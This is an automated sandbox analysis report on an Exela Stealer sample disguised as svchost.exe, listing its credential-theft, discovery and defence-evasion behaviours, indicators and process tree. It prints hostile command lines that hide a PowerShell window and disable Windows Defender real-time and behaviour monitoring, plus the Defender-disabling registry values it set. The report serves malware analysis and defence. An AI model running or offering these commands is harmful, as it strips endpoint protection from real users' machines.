Malware Analysis Report

2025-08-10 19:57

Sample ID 250630-wqfmwstps2
Target svchost.exe
SHA256 126d168549578cad4d37c87fbe0d85f5516c0449e82f19314c5c07bace902797
Tags
exelastealer collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

126d168549578cad4d37c87fbe0d85f5516c0449e82f19314c5c07bace902797

Threat Level: Known bad

The file svchost.exe was found to be: Known bad.

Malicious Activity Summary

exelastealer collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation pyinstaller spyware stealer trojan upx

Contains code to disable Windows Defender

Exelastealer family

Exela Stealer

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender DisableAntiSpyware settings

Grants admin privileges

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Clipboard Data

Unsecured Credentials: Credentials In Files

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses cryptocurrency files/wallets, possible credential harvesting

Obfuscated Files or Information: Command Obfuscation

Network Service Discovery

UPX packed file

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Launches sc.exe

Browser Information Discovery

Detects Pyinstaller

System Network Connections Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

Permission Groups Discovery: Local Groups

Unsigned PE

Gathers system information

Gathers network information

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Collects information from the system

Detects videocard installed

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-06-30 18:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-06-30 18:07

Reported

2025-06-30 18:09

Platform

win10v2004-20250610-en

Max time kernel

104s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Exela Stealer

stealer exelastealer

Exelastealer family

exelastealer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Grants admin privileges

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A api.gofile.io N/A N/A
N/A api.gofile.io N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\ARP.EXE N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

System Network Connections Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5492 wrote to memory of 5608 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 5492 wrote to memory of 5608 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 5492 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 5492 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 5492 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 5492 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Users\Admin\AppData\Local\Temp\no defender.exe
PID 2636 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 2636 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\no defender.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 6092 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 1556 wrote to memory of 6092 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Users\Admin\AppData\Local\Temp\Exela.exe
PID 4976 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6092 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 5876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 5876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6092 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1316 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1316 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3872 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3872 wrote to memory of 696 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2456 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2456 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4976 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 3388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 6092 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 1052 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1052 wrote to memory of 220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 6092 wrote to memory of 5728 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 5728 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 5236 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 5728 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5728 wrote to memory of 2220 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5236 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5236 wrote to memory of 656 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4976 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4976 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mousocoreworker.exe
PID 4976 wrote to memory of 4640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mousocoreworker.exe
PID 4976 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4976 wrote to memory of 4576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 6092 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 6092 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\Exela.exe C:\Windows\system32\cmd.exe
PID 4976 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4976 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4628 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 4628 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Users\Admin\AppData\Local\Temp\no defender.exe

"C:\Users\Admin\AppData\Local\Temp\no defender.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7D1F.tmp\7D20.tmp\7D21.bat "C:\Users\Admin\AppData\Local\Temp\no defender.exe""

C:\Users\Admin\AppData\Local\Temp\Exela.exe

"C:\Users\Admin\AppData\Local\Temp\Exela.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$hwnd = Get-Process -id $pid | select -Expand MainWindowHandle; $win32 = Add-Type @'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); } '@ -PassThru; $win32::ShowWindow($hwnd, 0)"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

